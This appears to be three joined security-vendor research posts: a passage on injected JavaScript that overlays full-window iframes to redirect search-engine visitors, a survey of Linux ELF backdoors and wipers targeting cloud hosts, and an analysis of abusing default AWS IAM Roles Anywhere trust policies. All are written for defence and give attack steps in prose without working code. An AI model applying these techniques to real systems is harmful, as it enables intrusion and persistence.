The decoded script checks for a document.referrer, meaning the traffic must have been directed from a different source, instead of directly typing a URL or domain into the web browser bar. In this case, the script is checking for a referral from one of many popular search engines. Then, depending on which search engine was used, the script will use the random ElementID present inside the page and add an iframe containing the malicious domain using the innerHTML property highlighted in blue in Figure 11 above. This ensures that traffic originating from these search engines is redirected to the injected link.

The script also extracts data following the # character in the viewer's URL. It then uses the atob function to decode Base64 text from this data and inject another iframe using the innerHTML property (Figure 12).

A screenshot of code in an IDE, highlighting a JavaScript snippet checking the URL for specific parameters related to search engines like Yahoo, AOL, and DuckDuckGo. A portion of the code injecting an iframe is highlighted in a box. Parts of the code and URLs are intentionally blurred for privacy.
Figure 12. If the referral is not from any search engine, then it will use the code from the URL.

In Figures 11 and 12, code for the iframe includes a CSS property z-index with a value of 30000, and it has the iframe's width and height values as 100%, with left and top as zero. With these values, the iframe will cover the entire browser window and hide the original content. This means someone can only interact with the content from the iframe and not the webpage's actual content. This is a common technique used in clickjacking, phishing attacks and malicious redirects.

Figure 13 shows a page from a legitimate website after redirection, leading to a ZIP archive download.

Screenshot of a spoofed MediaFire download page displaying an option to download a vector drawing app for Mac. The page highlights a button labeled "Download" and provides information about the file, including its type as a ZIP archive.
Figure 13. After redirection, the iframe shows content spoofing a hosting service and leading to a suspicious ZIP archive.

In Figure 13, note how the right side of the browser window contains two scroll bars. The outer scrollbar is for the legitimate webpage, while the inner scrollbar is for the iframe.

Conclusion

This analysis demonstrated how malicious JavaScript obfuscated with JSFireTruck redirects victims to unintended websites and unwanted content.

Website injection is a common attack method. Each day, thousands of legitimate websites are compromised in this manner. These compromised but legitimate websites can lead to malicious content, like pages serving unwanted content, exploits or malware.

Website administrators must keep their web servers up to date with the latest security updates, and administrators should also analyze their web servers for any signs of infection or compromise.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Advanced URL Filtering and Advanced DNS Security identify URLs and domains that host similar obfuscated JavaScript as malicious.
  • Cortex Cloud provides Web Applications and API Security (WAAS) protection through the runtime detection of OWASP Top 10 API risks, configuration drift such as misconfigurations and vulnerabilities and security breaches. Including, SQL injection (SQLi), Cross-site scripting (XSS), CVE exploit attempts, authentication bypass, sensitive data leakage, bot and scanner activity, and traffic anomalies. Cor​​tex Cloud protects WAAS infrastructure from the threats discussed within this article.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 for 25 examples of webpages with injected script using JSFireTruck obfuscation:

  • 03ba72c2b7b0e2a9c459b95646b4301840ae66b87de47d1117a44e2d2d3e3584
  • 044cb5f61172adb60a8bca0a7addadb6bb69107a4916057338c6578aa846b057
  • 0f7903f7822c6a958d94db1b5fe83a5032eaf40ef3439c9d7bf8beec66971615
  • 1476e45493ac53a8ee99fae8c3ac6b80ba724de0bba4c995f9d4c506c2f38165
  • 17e9650f044dda1c48854e460a3cd9fe092ddc11c2e8631fed9ec293b1df2a6a
  • 1fdc283f40e64818fc5dace2a7416d1d7bd1e494e28f759ac600958f55d25dfb
  • 2053fc3b075a4661ffead5a5aebcf32a4e6fcff3c67519da7e7b0ca887e27c67
  • 21b1ff38713db80d78393b28e345de9dac97e3a69242de849555a0b6c9beee45
  • 2c452a201153e0c6c9aa2f53496d9fb43accb1a6939fe1dad8b9941fdedd0002
  • 3378883ded7d58334d375584e3b1e8a78f6db1e4f024bb2b8fd7b2b44a5233d2
  • 34c427d2e8b83877cae2a6b7c9afddf2c58efef203e44f01aaca115d99cb9e37
  • 4a90e10d497d35306bbe2db4f7d35beb0aac3468f46cef497a8438f89e63b8b7
  • 4e96d39e316fe179dff7e23c7817f0333aac6f19733a93ec4a6d6ec0c5c3ce65
  • 6105f6bb9b3f11babc219aab72d5c0cfb61feb1c0d9da06835c66ce3b180f97a
  • 6f545f17b2111f84aea5319e8425d1219c4202c2bf634013af2dec9f358a7625
  • 76578de2041f34b550a963f286827e75112ee608314611df9bc1fdb195b8838d
  • 7d840b55806e1b6e733d416cffa472978f8ff574b3d87131a40d99447189ed52
  • 9aa62bcc51798458e79f36b5812cd0ba2b62f4388d4f36f04708880601fb37ec
  • 9e42e7df0921b694be99c50db3bbd25ed6cf8a21ba3a4f2c0c56623e8e0db570
  • ae99713386f4497131473d901f006548fde88e9f78cadfad720e5a1c7850586a
  • dc58b2cec0319310ec07546a8c9cf643f31d7eecdcf4937817d06a051b80c212
  • dedeb23e38f775ed45196c506c1cc4e8b64ca88204209d63a075c98a47c20cb8
  • e48fab88fe3a144e2bd21d73e343391fd5cf642ed52827c7f663e33776437f60
  • e924c0b5261d298fec104880cc1274abd9d8ceff123974ee44e57bbf7bdc9985
  • ed1d05c988981fd0ddbf4ef634849436c99ad09c3f891189652aa97a2f66f9c3

 

The Evolution of Linux Binaries in Targeted Cloud Operations

Posted on by Nathaniel Quist

Executive Summary

Unit 42 researchers have identified a growing threat to cloud security: Linux Executable and Linkage Format (ELF) files that threat actors are developing to target cloud infrastructure. We predict that threat actors targeting cloud environments will start using more complex tools in their exploits. This will include reworking, improving and tailoring existing tools that historically only targeted Linux operating systems (OS). The ELF malware samples threat actors use will include backdoors, droppers, remote access Trojans (RATs), data wipers and vulnerability-exploiting binaries.

During our investigation, we focused on five ELF-based malware families, each of which threat actor groups have used to target cloud environments during their operations. This involvement includes malicious operations targeting cloud environments and the direct exploitation of cloud infrastructure using these ELF binaries. These activities suggest that attackers will continue to use ELF binaries against cloud infrastructure.

We analyzed each of the families and found that they had at least two significant code updates within the last year, meaning threat actors are actively updating and supporting them. Additionally, each of the malware strains accounted for at least 20 unique sightings of samples in the wild over the last year. This means that threat actors are actively using them.

We believe these malware families are highly likely to be used in future attacks targeting cloud environments, including infrastructure.

Palo Alto Networks customers are better protected through the threats described in this article through Cortex Cloud.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Linux Malware, Machine Learning

Background

Our recent report on cloud threats showed that cloud-based alerts increased on average 388% during 2024. Additionally, 45% of organizations are reporting a rise in advanced persistent threat (APT) attacks. As threat actors target cloud infrastructure at increasing rates, defenders must hunt for potential attack vectors that cloud threat actors could use for access, persistence and operations. Threat hunters could benefit from investigating malicious executables that can be used against cloud endpoints.

This article explores the types of malicious binaries that threat actors are developing for use in attacks against Linux-based environments. ELF files are a common standard file format for executable files within Linux operating systems (OS). Researchers estimate that between 70% and 90% of all computational instances within cloud environments are based on variants (also known as flavors) of Linux OS. While ELF-based malware is not new, these malware families and the types of attack techniques they involve are likely to evolve toward the targeting of cloud infrastructure.

Evolving ELF Binaries

Commonly known Linux malware families can evolve to actively target cloud resources. Attackers can adapt and deploy these families into cloud workloads and container environments with relative ease due to the ubiquity of Linux OS instances within the standard cloud environment.

Our researchers pinpointed examples of evolving strains of ELF-based malware that include NoodleRAT, Winnti, SSHdInjector, Pygmy Goat and AcidPour. These ELF binaries use techniques such as dynamic linker hijacking, where they abuse the LD_PRELOAD environment variable to:

  • Inject malicious code into legitimate system processes
  • Hook into critical Linux services such as the SSH daemon (sshd)
  • Exploit vulnerabilities or misconfigurations found in containerized infrastructure

This allows threat actors to achieve persistence, maintain stealthy command and control (C2) channels, covertly exfiltrate data and impact operations by wiping critical data.

NoodleRAT

This malware enables threat actors to perform C2 operations on a targeted endpoint, including:

  • Access via reverse shell
  • SOCKS proxy tunneling
  • Encryption of communications
  • Scheduled code execution
  • Uploading and downloading of files
  • Process name spoofing

NoodleRAT has both Windows and Linux variants. The Linux variant is an ELF-based backdoor. Although Linux NoodleRAT code bears similarities to other Linux backdoor malware, including Rekoobe and Tiny SHell, NoodleRAT is considered its own malware family.

NoodleRAT has been observed in both cybercriminal and cyberespionage intrusions, including from Chinese-speaking threat actors such as Rocke and suspected nation-state actors associated with the Cloud Snooper campaign. The actors behind the Linux variant of NoodleRAT have targeted entities in multiple countries across the Asia-Pacific region including Thailand, India, Japan, Malaysia and Taiwan.

Winnti

Winnti has both Windows and Linux versions. This malware achieves persistence through abuse of the LD_PRELOAD environment variable, enabling it to load into memory without altering any legitimate system binaries.

The backdoor has the following functionality:

  • Providing remote command execution capability
  • Enabling file exfiltration
  • Supporting SOCKS5 proxying to facilitate C2 communication

The Linux variant of Winnti malware is a backdoor reportedly used by several China-nexus threat actors, including those that we track as Starchy Taurus (aka Winnti Group and BARIUM) and Nuclear Taurus (aka Tumbleweed Typhoon, THORIUM, Bronze Vapor). The backdoor consists of two files: a primary ELF executable (libxselinux) and an additional dynamic library (libxselinux.so).

SSHdInjector

This Linux SSH backdoor injects malicious code into the SSH daemon (sshd) at runtime. The injected code grants the threat actor persistent access and facilitates malicious activities such as:

  • Credential theft
  • Remote command execution
  • Malware ingress
  • File and directory access
  • Opening a remote shell
  • Data exfiltration

SSHdInjector has been observed being used by several China-nexus threat actors, including one that we track as Digging Taurus (aka Daggerfly, Evasive Panda). Targets are cyberespionage-related and have included individuals, government institutions, and telecommunications organizations.

Pygmy Goat

Pygmy Goat is a Linux backdoor that was discovered on Sophos XG firewall devices [PDF] but is designed to target additional Linux-based systems. The malware gains initial access and persistence through rootkit functionality by leveraging the libsophos.so library file, which is vulnerable to authentication bypass (CVE-2022-1040).

The executable then injects itself into the SSH daemon (sshd) using the LD_PRELOAD environment variable on the targeted device and intercepts SSH communications. The threat actor can initiate communications with the malware by sending specially crafted ICMP packets — a technique known as “port knocking” — or by sending a series of magic bytes embedded in SSH traffic.

Its capabilities include:

  • Establishing remote shells
  • Capturing network packets
  • Creating cron jobs
  • Tunneling via a reverse SOCKS5 proxy

Reported targets include government agencies and suppliers, non-governmental organizations (NGOs), healthcare and transportation sector entities in the Asia-Pacific region.

Acid Pour/AcidRain

AcidRain and the newer AcidPour variant are strains of destructive Linux wiper malware linked to the Russian threat actor Razing Ursa (aka Sandworm, Voodoo Bear). AcidRain is an ELF binary that targets modems and routers that are based on the MIPS architecture.

AcidPour is a similar ELF binary but is compiled for x86. It can affect a broader range of targets, such as Linux x86-based storage arrays, network devices and industrial control systems.

Both wipers use Input/Output Controls (IOCTLs) to effect destruction of data and then they self-delete for defense evasion. AcidPour or a new variant of this binary would be effective at wiping unprotected x86-based cloud systems if a threat actor gained shell access, for example via a successful web shell deployment or container escape.

We observed new hash values of these malware families in the months preceding this report. As organizations continue to migrate to the cloud, threat actors will continue to develop these malware families and pivot into cloud runtime environments. This highlights the need for enhanced detection and prevention security capabilities in cloud workloads and containers.

Conclusion

Cloud-based alerts increased on average 388% during 2024. We predict that threat actors targeting cloud environments will start using more complex tools in their attacks. This includes reworking, improving and tailoring existing tools that historically only targeted Linux OS systems.

Given the estimates previously cited that as many as 90% of cloud environments operate on Linux compute instances, the logical next step is for threat actors to use these malware families against cloud environments.

It is more critical than ever to implement endpoint security agents on cloud computing instances to ensure that all malicious runtime processing, network traffic and suspicious behavioral operations are detected. Modern cloud endpoint agents can detect these malware families. The introduction of machine learning in endpoint detection is a significant advancement in cloud security.

Palo Alto Networks Protection and Mitigation

We recommend a machine-learning detection approach to flag binaries. An evolving approach should consider factors like:

  • Kernel-mode system calls
  • Import functions
  • Evasion techniques
  • Network traffic
  • Unknown binary patterns

Figure 1 shows a previously unknown ELF binary that triggered the Cortex Machine Learning alert.

Screenshot of Cortex XDR showing an execution flow. At the top are numerous icons representing a chain of events. At bottom is a table explaining the different processes. These include the Resource, Category, Action, Alert Name and more.
Figure 1. Cortex Cloud ELF Machine Learning execution alert.

ELF Machine Learning Detections

Palo Alto Networks Cortex Cloud has developed a new machine learning module specifically to detect Linux ELF files. Cortex researchers conducted tests using over 100 unique ELF binaries across all five of the malware families discussed in this article. Each malware family was successfully detected, and 92% of all samples were accurately flagged as malicious.

The remaining 8% were found to contain Linux shared (.so) libraries that were out of scope for the model used.

The files that were detected fell within the following testing criteria:

  • Malicious
  • Suspicious
  • Benign

Samples that received a score of 0.85 or above are categorized as malicious, results between 0.84 and 0.65 are considered suspicious and any result below 0.64 is considered benign.

Figure 2 shows that 61% of the samples tested had results above 0.85 and were considered malicious.

Pie chart of the machine learning testing scores showing the distribution as: 61.5% malicious, 30.8% suspicious, and 7.7% benign.
Figure 2. ELF machine learning testing scores by percentage of benign, suspicious or malicious.

92.3% of all samples submitted surpassed the suspicious threshold of 0.65. This demonstrates that all but 7.7% of the samples provided are considered suspicious and would trigger an alert if they were executed within the environment.

PowerShell and VBS Machine Learning Detections

We also used the Cortex PowerShell and VBS Machine Learning module to investigate the detection of cloud-specific operations. We submitted over 100 PowerShell and Visual Basic scripts (VBS) to the ML model. These scripts were hand picked as malicious scripts that performed the following activities:

  • Cloud resource discovery and creation
  • Storage container object deletion and exfiltration
  • Identity access and management (IAM) operations

Figure 3 shows that 67% of these scripts were successfully identified as malicious or suspicious. Notably, nearly 96% of the malicious samples received a score of 0.95 or higher.

Pie chart of the PowerShell and VBS machine learning testing scores as: 56.8% Malicious (>95%), 33.0% Benign, 8.0% Suspicious, and 2.3% Malicious.
Figure 3. PowerShell and VBS Machine Learning testing scores by percentage of benign, suspicious or malicious.

Cortex Cloud

Defenders can gain valuable insights by threat hunting for common ELF malware executions within cloud endpoints. This can be done through cloud detection and response (CDR), which is a cloud security solution that combines:

  • Endpoint detection and response (EDR) capabilities
  • Detection and prevention of executable processes running on cloud endpoints
  • Auditing and logging capabilities inherent within the cloud service platform

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Cortex ELF Machine Learning detection module
  • Cortex PowerShell and VBS Machine Learning detection module

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Several sources were used to support and guide this research:

Roles Here? Roles There? Roles Anywhere: Exploring the Security of AWS IAM Roles Anywhere

Posted on by Samantha Stallings

Executive Summary

As organizations depend more on applications, devices and services to interact across hybrid environments, non-human identities are becoming more common. To enable secure access for these identities within the organization, Amazon Web Services (AWS) has introduced the AWS Identity and Access Management (IAM) Roles Anywhere service that allows workloads outside of AWS to authenticate using digital certificates instead of traditional access keys.

The AWS IAM Roles Anywhere service offers organizations several security advantages and it is relatively simple to configure, especially for an organization that already has a public key infrastructure (PKI). Usually, implementation of this service requires organizations to carefully consider least privilege and access permissions when designing the infrastructure. Failure to implement proper security controls and practical defense-in-depth architectures could allow an organization to inadvertently open their cloud environment to unwanted exposures.

In this article, we explore key risks associated with improper configuration or architectural design while using the Roles Anywhere service. These risks come from a common root cause. The service's default configuration is relatively permissive within the context of the AWS account and region where the service is configured for use.

We analyze these risks from both a threat actor’s perspective and an organization’s perspective. This exploration should help readers better understand the potential risks involved when designing the usage of this service and how organizations mitigate them.

Cortex Cloud provides protections against the Public Key Infrastructure (PKI) misconfigurations detailed within this article. By using both Cloud XDR Agent based rules, as well as behavioral analytic rules, to detect when IAM policies are being misused, Cortex Cloud is able to detect and prevent malicious operations using its XSOAR platform automation capabilities.

Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics AWS, Kubernetes

Introduction

Roles Anywhere is an access management service that was first introduced in 2022. It enables external workloads to authenticate to AWS using X.509 digital certificates. This capability eliminates the need to create and manage long-term credentials in such workloads and ultimately makes cloud API operations more secure and easier to manage within AWS environments.

To state it simply, Roles Anywhere can be used to define which certificate authority (CA) certificates are eligible to validate clients’ certificates. A client certificate that is signed by such a CA can be used to:

  • Authenticate to AWS
  • Trade the certificate-based identity for a corresponding cloud-native identity (expressed as a set of temporary credentials)
  • Call AWS cloud APIs as normal by signing requests with those temporary AWS credentials

Key Components and Concepts

The authentication process consists of several core components:

  • Trust anchors: A trust anchor is the resource that represents the CA certificate in Roles Anywhere. When a trust anchor is created, a CA certificate must be attached to it. There are two types of trust anchors:
    • AWS Certificate Manager-Private Certificate Authority (ACM-PCA) certificate: This is a managed AWS resource.
    • Certificate Bundle: An X.509 certificate encoded in Privacy-Enhanced Mail (PEM) ASCII format that is attached to the trust anchor directly.
  • Profiles: These are resources that determine the level of access for an entity that is authenticated with Roles Anywhere. Profiles are assigned with identity and access management (IAM) roles that define the permissions and with additional mechanisms to fine-tune the permissions.
  • IAM Roles: The IAM roles are assigned with the actual IAM policies that grant (or remove) permissions.
Diagram illustrating the process of sending credentials to a client using AWS identities. It shows a device with a client certificate initiating a 'Create-Session request signed with private key', interacting with 'Trust Anchor ARN, Profile ARN, Role ARN', and confirming through IAM Role and Profile, resulting in credentials being sent to the client.
Figure 1. High-level view of the authentication process.

In practice, authentication using Roles Anywhere is made by sending a request to the /sessions endpoint. The request is signed with the private key of the certificate and takes as its parameters the Amazon Resource Name (ARN) of the Trust Anchor, as well as the ARNs of the Profile and Role.

An easy way to compose the request is by using the aws_signing_helper tool. This tool automates the authentication process, and it can also make the credentials available locally by emulating the Instance Metadata Service endpoint in much the same way that Amazon Elastic Compute Cloud (EC2) instances work.

Figure 2 shows examples of requests and responses using Roles Anywhere.

Screenshot showing an API request and response in Postman interface. The request tab highlights a GET command querying AWS credentials with Amazon's URL, while the response tab displays returned AWS credentials, including 'AccessKeyId', 'SecretAccessKey', and 'SessionToken'. Some of the information is redacted for privacy.
Figure 2. Request and response examples for authentication using Roles Anywhere.

Regular Usage of Roles Anywhere

To better understand the configuration flow of Roles Anywhere, consider the following scenario:

  • A Kubernetes pod outside of AWS requires access to read objects in a Simple Storage Service (S3) bucket.
  • The cloud engineer issues a certificate and signs it using the Trust Anchor’s certificate. The signed certificate is then stored in the pod, together with its private key.
  • The engineer creates an IAM role that includes the relevant S3 permissions and attaches it to a Roles Anywhere profile.
  • The Kubernetes pod can now use the certificate, as well as its associated role credentials, along with the key to sign, authenticate and read objects within the configured S3 bucket.

Securing the Default Authentication Process

One interesting aspect of this authentication process is that by default, there is no correlation between the trust anchor and a specific profile. It is crucial for organizations to understand the risks involved with this setup and configure the Roles Anywhere resources and the IAM roles trust policies accordingly.

In other words, organizations must configure a client certificate to be signed by a specific trust anchor and destined to a specific profile. This will prevent access from any other profile and trust anchor in the same AWS account and region.

To demonstrate the possible consequences of this process, consider the pod scenario outlined above. So far, the steps in the flow are legitimate. For all intents and purposes, the pod has the exact permissions it needs.

But what if an attacker obtains access to the pod? If other profiles were created in the same AWS account and region, the attacker may use the certificate to get access to the roles of these profiles:

  • The attacker deduces the ARNs of another IAM role that is attached to the same profile or the ARNs and attached roles of another profile. Deducing these ARNs is a complex task that requires additional permissions to the AWS environment. We discuss these techniques later in this article.
  • Having obtained all the necessary information, the attacker can now formulate requests to obtain credentials of different roles and use their permissions to conduct malicious operations.

AWS provides several ways to limit access from Roles Anywhere by using conditions in the role’s trust policy. However, the Roles Anywhere default trust policy has no condition in its statement, meaning that any environment using the default policy does not impose access limitations. It is the organization’s responsibility to ensure they are not using default configurations for Roles Anywhere configurations.

When a default role that is used for Roles Anywhere is created, the following trust policy is set:

This policy states that this role can be assumed by the Roles Anywhere service. However, there are no other restrictions for the sources that can assume it. This means that if a role is attached to a profile, any certificate that is signed by a trust anchor in the same region can assume this role.

To address this, AWS created the Condition section in the policy. Conditions enable additional restrictions on resources, specifying the requirements these resources must meet to carry out an action.

The following policy adds a Condition section on top of the default policy, to limit the access of Roles Anywhere authentication to the role, only from a specific trust anchor.

To further limit the access of signed certificates, we recommend taking advantage of the certificate attribute mapping. AWS also recommends this in the Roles Anywhere documentation:

Notification with warning icon and "Important" in bold before displaying a recommended action from AWS.
Figure 3. AWS recommendation to use attribute mapping.

Essentially, it is possible to map a certificate’s attributes to values that will be evaluated in the trust policy. People can use this to specify access to roles based on the certificate’s Common Name, Organization Unit or any other attribute in the certificate.

This is recommended because it ensures that if a resource that uses Roles Anywhere for authentication is compromised, it will not be able to access additional roles.

The following condition uses the trust anchor condition from the last section and also limits access based on the certificate’s attributes:

As with any other service, the principle of least privilege should be considered when implementing Roles Anywhere infrastructure. Certificate attribute mapping should be used to accomplish this.

Threat Actor’s Perspective

Scenario #1 - Attacker’s Use of Valid Certificates and Private Keys

As outlined above, the following pieces of information are needed to authenticate using Roles Anywhere:

  • The client certificate
  • The client certificate’s private key
  • The ARN of the trust anchor that signed the certificate
  • The ARN of a profile in the same region
  • The ARN of an IAM role that is attached to the profile

In the following scenario, an attacker compromises a default Roles Anywhere configuration for a client certificate that is used for authentication with its private key. To maliciously leverage the default configuration to access additional roles in the account the attacker still needs to discover the ARNs of the relevant resources to authenticate to AWS. Obtaining the ARNs is not a straightforward task and requires additional independent privileges inside the account.

The following techniques can be used to obtain this information:

Using Roles Anywhere actions: An attacker who has gained sufficient permissions to the Roles Anywhere service can simply execute actions to obtain the relevant ARNs. They can do this using the list-trust-anchors and list-profiles actions, which require the rolesanywhere:ListTrustAnchors and rolesanywhere:ListProfiles permissions, respectively. The output of these actions contains all the necessary ARNs for the authentication request, as the list-profiles command will return all the roles that are attached to the profile.

Retrieving data from logs: CloudTrail is the main logging mechanism of AWS. Among CloudTrail logs, an attacker with independent access to CloudTrail logs (or to storage services that contain them) could locate items that are created by the Roles Anywhere service. Some CloudTrail logs contain all the ARNs required for the authentication process. Logs of the Roles Anywhere service disclose these ARNs in the events of several actions.

The most relevant log is CreateSession. This log is created when Roles Anywhere is used for authentication, in other words, to create temporary credentials and send them to the user. Figure 3 shows an example of a CreateSession log entry and notes the associated ARN.

A screenshot of a JSON code snippet with various key-value pairs, highlighting an AWS IAM role creation event with associated role and policy ARNs.
Figure 4. CreateSession CloudTrail log.

The ARNs of a trust anchor, a profile and one of its attached roles appear in this event log. If the attacker’s certificate was signed by the trust anchor that appears in the log, they can use it to perform authentication.

Figure 5 shows a high-level illustration of the attackers’ steps.

Diagram illustrating a cybersecurity attack where a malicious entity grabs a certificate and key from a pod, using credentials and ARNs to connect to different profiles including pod, storage, and database profiles, linked to trust anchors in the cloud.
Figure 5. High-level view of the attackers’ steps.

Scenario #2 - Exploiting Direct Permissions to Roles Anywhere

Another scenario in which a default configuration of the Roles Anywhere service could be exploited is when an attacker gains access to an identity that has Roles Anywhere permissions. These permissions may be granted by a direct Allow statement on the service or through the NotAction element.

The following steps can be used to take advantage of these permissions:

  • The attacker gains access to an identity that has Roles Anywhere default configurations and permissions.
  • The attacker creates two certificates — a CA certificate and a client certificate — and then uses the CA certificate to sign the client certificate. Having created the certificates, the attacker also owns their private keys.
  • The attacker uses the compromised identity to create a trust anchor and attaches the CA certificate to the anchor.
  • Using list permissions of Roles Anywhere, the attacker gathers profiles and IAM roles ARNs.
  • Using the ARNs, the client certificate and its private key, the attacker authenticates using Roles Anywhere.
  • If the trust policy of the IAM role denies access, the attacker can check the Roles Anywhere subjects to find details about a certificate that was previously used for authentication and copy its fields to a new client certificate.

In more detail, an attacker with sufficient Roles Anywhere permissions can create a certificate, sign it with the attacker’s own CA certificate and upload it to a new or existing trust anchor. This requires the rolesanywhere:CreateTrustAnchor or rolesanywhere:UpdateTrustAnchor permissions.

Since the attacker controls both the client certificate and the CA certificate, the certificate will be valid. The next step is to understand which profiles and roles are available, by using the Roles Anywhere list-profiles command or any other technique that is mentioned above.

With this information, the attacker can create credentials through Roles Anywhere and perform operations in the context of the role that was used.

If the target organization’s security measures fail to detect the malicious activity, this process also acts as a persistence vector for the attacker, as a trust anchor can be used to generate valid credentials until the issue is resolved.

Mitigations and Recommendations

  • We highly recommend adding conditions to the default trust policy of roles that are used with Roles Anywhere. As mentioned above, the default policy allows any trust anchor to assume the role. It is crucial to limit the access to the role only from a specific trust anchor — the one that is used to authenticate the relevant workload.

Additional conditions should also be implemented to limit access only for certificates with certain attributes, such as Common Name or Organization. However, these conditions are not a silver bullet, and they can be bypassed under certain circumstances. For example, a bypass might be possible if an attacker was able to extract attribute information from the certificate.

  • We recommend using trust anchors of the ACM-PCA type. When using ACM-PCA, even an attacker who obtains full access to the Roles Anywhere service will not be able to upload their own generated CA certificate to the trust anchor. The trust anchor type cannot be changed, meaning that ACM-PCA permissions (which are uncommon) are needed to authenticate.
    • This is a crucial point. If the roles that are supposed to be assumed by the trust anchors are using the condition from the previous bullet, they cannot be accessed. We should note that private CAs in AWS have their own security considerations and may also pose a risk if not configured correctly.
  • Permissions should always be assigned based on the principle of least privilege. The ability to authenticate with Roles Anywhere is usually given to non-human identities, and the devices that use this service usually have specific and pre-determined tasks that they need to perform. Therefore, the access level of these identities should not exceed the requirements of the tasks they are assigned to complete. Apart from the IAM roles themselves, it is possible to associate a session policy with a profile. This policy defines the maximum permissions the role can have, when assumed through Roles Anywhere.
  • Regularly monitor and track AWS IAM Roles Anywhere resources: It is crucial to maintain continuous monitoring of trust anchors, profiles and associated resources. Trust anchors and profiles are not created frequently, making their creation or modification suspicious events. Any unexpected changes to these resources should be immediately investigated to ensure no unauthorized activity is occurring. Regular audits and automated alerts can help detect and respond to potential security threats in a timely manner.
  • Execute the following XQL query in Cortex Query Builder to identify roles that trust the Roles Anywhere service but do not enforce any conditions.

Conclusion

This article has explored key risks associated with using default configurations for the Roles Anywhere service in AWS, both from a potential attacker's perspective and a defender's perspective. We have provided several mitigation strategies organizations should implement to better manage the associated risks. We hope that this analysis helps readers better understand the potential vulnerabilities involved in using the default functionality of this service, and how best to mitigate them.

One key takeaway from this article is that when using services from cloud providers, it’s crucial to thoroughly understand their configurations and architecture rather than relying on them uncritically.

  • Follow security best practices, least privilege and defense-in-depth strategies.
  • This helps ensure that services are properly architected and monitored for configuration modifications.
  • Maintaining runtime monitoring will help to ensure customized cloud platforms operate securely

Cortex Cloud provides protections against the Public Key Infrastructure (PKI) misconfigurations detailed within this article. By using both Cloud XDR Agent based rules, as well as behavioral analytic rules, to detect when IAM policies are being misused, Cortex Cloud is able to detect and prevent malicious operations using its XSOAR platform automation capabilities.

Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Get the latest news, invites to events, and threat alerts

Default Heading

Read the article Right Arrow